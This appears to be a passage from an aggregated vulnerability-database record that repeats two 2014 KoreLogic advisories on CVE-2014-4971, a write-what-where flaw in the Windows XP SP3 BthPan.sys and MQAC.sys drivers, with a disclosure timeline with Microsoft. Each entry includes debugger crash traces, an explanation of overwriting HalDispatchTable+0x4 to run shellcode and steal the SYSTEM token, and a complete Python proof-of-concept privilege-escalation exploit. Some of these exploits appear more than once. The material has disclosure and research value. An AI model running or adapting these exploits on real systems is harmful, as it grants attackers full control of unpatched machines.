ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\r\nnt!IopCompleteRequest+0x92:\r\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in BthPan it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have not\r\n been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\r\n passed since vendor acknowledgement of the initial\r\n report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\r\n does not impact any "up-platform" products. Says they\r\n are investigating embedded platforms. Does not provide\r\n CVE number.\r\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\r\n the report of this vulnerability with another and that\r\n they cannot reproduce the described behavior.\r\n Microsoft asks for an updated Proof-of-Concept, crash\r\n dumps or any further analysis of the vulnerability\r\n that KoreLogic can provide.\r\n 2014.06.25 - KoreLogic provides Microsoft with an updated\r\n Proof-of-Concept which demonstrates using the\r\n vulnerability to spawn a system shell.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that a CVE\r\n ID be issued for this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\r\n identical to KL-001-2014-003 and issues CVE-2014-4971\r\n for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n"""\r\n\r\n#!/usr/bin/python2\r\n#\r\n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\n# Matt Bergin (KoreLogic / Smash the Stack) \r\n# CVE-2014-4971\r\n#\r\nfrom ctypes import *\r\nfrom struct import pack\r\nfrom os import getpid,system\r\nfrom sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them \r\n def getBase(name=None):\r\n \tretArray = c_ulong*1024\r\n \tImageBase = retArray()\r\n \tcallback = c_int(1024)\r\n \tcbNeeded = c_long()\r\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n \tfor base in ImageBase:\r\n \t\tdriverName = c_char_p("\\x00"*1024)\r\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\r\n \t\tif (name):\r\n \t\t\tif (driverName.value.lower() == name):\r\n \t\t\t\treturn base\r\n \t\telse:\r\n \t\t\treturn (base,driverName.value)\r\n \treturn None\r\n \r\n handle = CreateFileA("\\\\\\\\.\\\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n if (handle == INVALID_HANDLE_VALUE):\r\n\tprint "[!] Could not open handle to BthPan"\r\n\texit(1)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = "\\xcc\\xcc\\xcc\\xcc"+"\\x90"*0x400\r\n WriteProcessMemory(-1, 0x1, "\\x90"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\n"""\r\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\r\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\r\n(United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a proven\r\ntrack record of providing security services to entities ranging from\r\nFortune 500 to small and mid-sized companies. We are a highly skilled\r\nteam of senior security consultants doing by-hand security assessments\r\nfor the most important networks in the U.S. and around the world. We\r\nare also developers of various tools and resources aimed at helping\r\nthe security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87151"}, {"lastseen": "2017-11-19T13:17:04", "description": "No description provided by source.", "published": "2014-07-24T00:00:00", "type": "seebug", "title": "Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87150", "id": "SSV:87150", "sourceData": "\n Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-003\r\nPublication Date: 2014.07.18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: MQ Access Control\r\n Affected Versions: 5.1.0.1110\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the MQAC module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the MQAC device and\r\n subsequently make DeviceIoControlFile() calls into that device.\r\n During the IRP handler routine for 0x1965020f the user provided\r\n OutputBuffer address is not validated. This allows an attacker\r\n to specify an arbitrary address and write (or overwrite) the\r\n memory residing at the specified address. This is classically\r\n known as a write-what-where vulnerability and has well known\r\n exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. In our\r\n fuzzing testcase, the specified OutputBuffer in the\r\n DeviceIoControlFile() call is 0xffff0000.\r\n\r\nSTACK_TEXT: \r\nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\r\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\r\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\r\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\r\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the mqac driver.\r\n\r\nOLLOWUP_IP: \r\nmqac!AC2QM+5d\r\nb230af37 891e mov dword ptr [esi],ebx\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\r\nErrCode = 00000002\r\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\r\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nmqac!AC2QM+0x5d:\r\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in MQAC it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have\r\n not been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\r\n have passed since vendor acknowledgement of the\r\n initial report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft responds to KoreLogic that the\r\n vulnerability does not affect an "up-platform"\r\n product. Says they are investigating embedded\r\n platforms. Does not provide a CVE number or a\r\n disclosure date.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that\r\n a CVE ID be issued to this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\r\n be identical to KL-001-2014-002 and issues\r\n CVE-2014-4971 for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack)\r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n\r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them :)\r\n def getBase(name=None):\r\n retArray = c_ulong*1024\r\n ImageBase = retArray()\r\n callback = c_int(1024)\r\n cbNeeded = c_long()\r\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n for base in ImageBase:\r\n driverName = c_char_p("\\x00"*1024)\r\n GetDeviceDriverBaseNameA(base,driverName,48)\r\n if (name):\r\n if (driverName.value.lower() == name):\r\n return base\r\n else:\r\n return (base,driverName.value)\r\n return None\r\n\r\n handle = CreateFileA("\\\\\\\\.\\\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n print "[+] Handle \\\\\\\\.\\\\MQAC @ %s" % (handle)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = "\\x50\\x00\\x00\\x00"+"\\x90"*0x400\r\n WriteProcessMemory(-1, 0x1, "\\x90"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x5000, "\\xcc", 77, byref(c_int(0)))\r\n #Overwrite Pointer\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\r\n print "[+] HalDispatchTable+0x4 overwritten"\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\nThe contents of this advisory are copyright(c) 2014\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87150"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation", "edition": 1, "published": "2014-07-21T00:00:00", "title": "Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-21T00:00:00", "id": "EXPLOITPACK:6C1249C6408DDF548B106905FC847650", "href": "", "sourceData": "\"\"\"\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\nAdvisory ID: KL-001-2014-002\nPublication Date: 2014-07-18\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Microsoft\n Affected Product: Bluetooth Personal Area Networking\n Affected Versions: 5.1.2600.5512\n Platform: Microsoft Windows XP SP3\n CWE Classification: CWE-123: Write-what-where Condition\n Impact: Privilege Escalation\n Attack vector: IOCTL\n CVE ID: CVE-2014-4971\n\n2. Vulnerability Description\n\n A vulnerability within the BthPan module allows an attacker to\n inject memory they control into an arbitrary location they\n define. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\n calling NtQueryIntervalProfile.\n\n3. Technical Description\n\n A userland process can create a handle into the BthPan device\n and subsequently make DeviceIoControlFile() calls into that\n device. During the IRP handler routine for 0x0012b814 the user\n provided OutputBuffer address is not validated. This allows an\n attacker to specify an arbitrary address and write\n (or overwrite) the memory residing at the specified address.\n This is classicaly known as a write-what-where vulnerability and\n has well known exploitation methods associated with it.\n\n A stack trace from our fuzzing can be seen below. In our fuzzing\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\n call is 0xffff0000.\n\nSTACK_TEXT:\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\nWARNING: Stack unwind information not available. Following frames may be wrong.\n\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\n command shows the fault originating in the bthpan driver.\n\nFOLLOWUP_IP:\nbthpan!BthpanReqAdd+16b\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\n\n Reviewing the TRAP_FRAME at the time of crash we can see\n IopCompleteRequest() copying data from InputBuffer into the\n OutputBuffer. InputBuffer is another parameter provided to the\n DeviceIoControlFile() function and is therefore controllable by\n the attacker. The edi register contains the invalid address\n provided during the fuzz testcase.\n\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\nErrCode = 00000002\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\nnt!IopCompleteRequest+0x92:\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\n\n A write-what-where vulnerability can be leveraged to obtain\n escalated privileges. To do so, an attacker will need to\n allocate memory in userland that is populated with shellcode\n designed to find the Token for PID 4 (System) and then overwrite\n the token for its own process. By leveraging the vulnerability\n in BthPan it is then possible to overwrite the pointer at\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\n NtQueryIntervalProfile() will subsequently call\n HalDispatchTable+0x4, execute our shellcode, and elevate the\n privilege of the exploit process.\n\n4. Mitigation and Remediation Recommendation\n\n None. A patch is not likely to be forthcoming from the vendor.\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin of KoreLogic\n Security, Inc.\n\n6. Disclosure Timeline\n\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\n report; states XP is no longer supported and asks if\n the vulnerability affects other versions of Windows.\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\n support policy for XP.\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\n addressed with patches.\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\n vulnerability report.\n 2014.04.29 - Microsoft opens case to investigate the impact of the\n vulnerability on non-XP systems.\n 2014.05.06 - Microsoft asks again if this vulnerability affects\n non-XP systems.\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\n report is for XP and other Windows versions have not\n been examined.\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\n passed since vendor acknowledgement of the initial\n report. KoreLogic requests CVE number for the\n vulnerability, if there is one. KoreLogic also\n requests vendor's public identifier for the\n vulnerability along with the expected disclosure date.\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\n does not impact any \"up-platform\" products. Says they\n are investigating embedded platforms. Does not provide\n CVE number.\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\n the report of this vulnerability with another and that\n they cannot reproduce the described behavior.\n Microsoft asks for an updated Proof-of-Concept, crash\n dumps or any further analysis of the vulnerability\n that KoreLogic can provide.\n 2014.06.25 - KoreLogic provides Microsoft with an updated\n Proof-of-Concept which demonstrates using the\n vulnerability to spawn a system shell.\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\n receipt of the updated PoC. Also requests that a CVE\n ID be issued for this vulnerability.\n 2014.07.02 - 45 business days have elapsed since Microsoft\n acknowledged receipt of the vulnerability report and\n PoC.\n 2014.07.07 - KoreLogic requests CVE from MITRE.\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\n identical to KL-001-2014-003 and issues CVE-2014-4971\n for both vulnerabilities.\n 2014.07.18 - Public disclosure.\n\n7. Proof of Concept\n\"\"\"\n\n#!/usr/bin/python2\n#\n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\n# Matt Bergin (KoreLogic / Smash the Stack) \n# CVE-2014-4971\n#\nfrom ctypes import *\nfrom struct import pack\nfrom os import getpid,system\nfrom sys import exit\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\n \n # thanks to offsec for the concept\n # I re-wrote the code as to not fully insult them \n def getBase(name=None):\n \tretArray = c_ulong*1024\n \tImageBase = retArray()\n \tcallback = c_int(1024)\n \tcbNeeded = c_long()\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\n \tfor base in ImageBase:\n \t\tdriverName = c_char_p(\"\\x00\"*1024)\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\n \t\tif (name):\n \t\t\tif (driverName.value.lower() == name):\n \t\t\t\treturn base\n \t\telse:\n \t\t\treturn (base,driverName.value)\n \treturn None\n \n handle = CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\n if (handle == INVALID_HANDLE_VALUE):\n\tprint \"[!] Could not open handle to BthPan\"\n\texit(1)\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\n buf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\n kBase,kVer = getBase()\n hKernel = LoadLibraryExA(kVer,0,1)\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\n HalDispatchTable -= hKernel\n HalDispatchTable += kBase\n HalDispatchTable += 0x4\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\n CloseHandle(handle)\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\n exit(0)\n\n\"\"\"\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\n(United States) License:\nhttp://creativecommons.org/licenses/by-sa/4.0/\n\nKoreLogic, Inc. is a founder-owned and operated company with a proven\ntrack record of providing security services to entities ranging from\nFortune 500 to small and mid-sized companies. We are a highly skilled\nteam of senior security consultants doing by-hand security assessments\nfor the most important networks in the U.S. and around the world. We\nare also developers of various tools and resources aimed at helping\nthe security community.\nhttps://www.korelogic.com/about-korelogic.html\n\nOur public vulnerability disclosure policy is available at:\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\n\"\"\"", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation", "edition": 1, "published": "2014-07-19T00:00:00", "title": "Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-19T00:00:00", "id": "EXPLOITPACK:2A8B8964BB26CD0903DEAAD854198D2F", "href": "", "sourceData": "Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\nAdvisory ID: KL-001-2014-003\nPublication Date: 2014.07.18\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Microsoft\n Affected Product: MQ Access Control\n Affected Versions: 5.1.0.1110\n Platform: Microsoft Windows XP SP3\n CWE Classification: CWE-123: Write-what-where Condition\n Impact: Privilege Escalation\n Attack vector: IOCTL\n CVE ID: CVE-2014-4971\n\n2. Vulnerability Description\n\n A vulnerability within the MQAC module allows an attacker to\n inject memory they control into an arbitrary location they\n define. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\n calling NtQueryIntervalProfile.\n\n3. Technical Description\n\n A userland process can create a handle into the MQAC device and\n subsequently make DeviceIoControlFile() calls into that device.\n During the IRP handler routine for 0x1965020f the user provided\n OutputBuffer address is not validated. This allows an attacker\n to specify an arbitrary address and write (or overwrite) the\n memory residing at the specified address. This is classically\n known as a write-what-where vulnerability and has well known\n exploitation methods associated with it.\n\n A stack trace from our fuzzing can be seen below. In our\n fuzzing testcase, the specified OutputBuffer in the\n DeviceIoControlFile() call is 0xffff0000.\n\nSTACK_TEXT: \nb1c4594c 8051cc7f 00000050 ffff0000 00000001 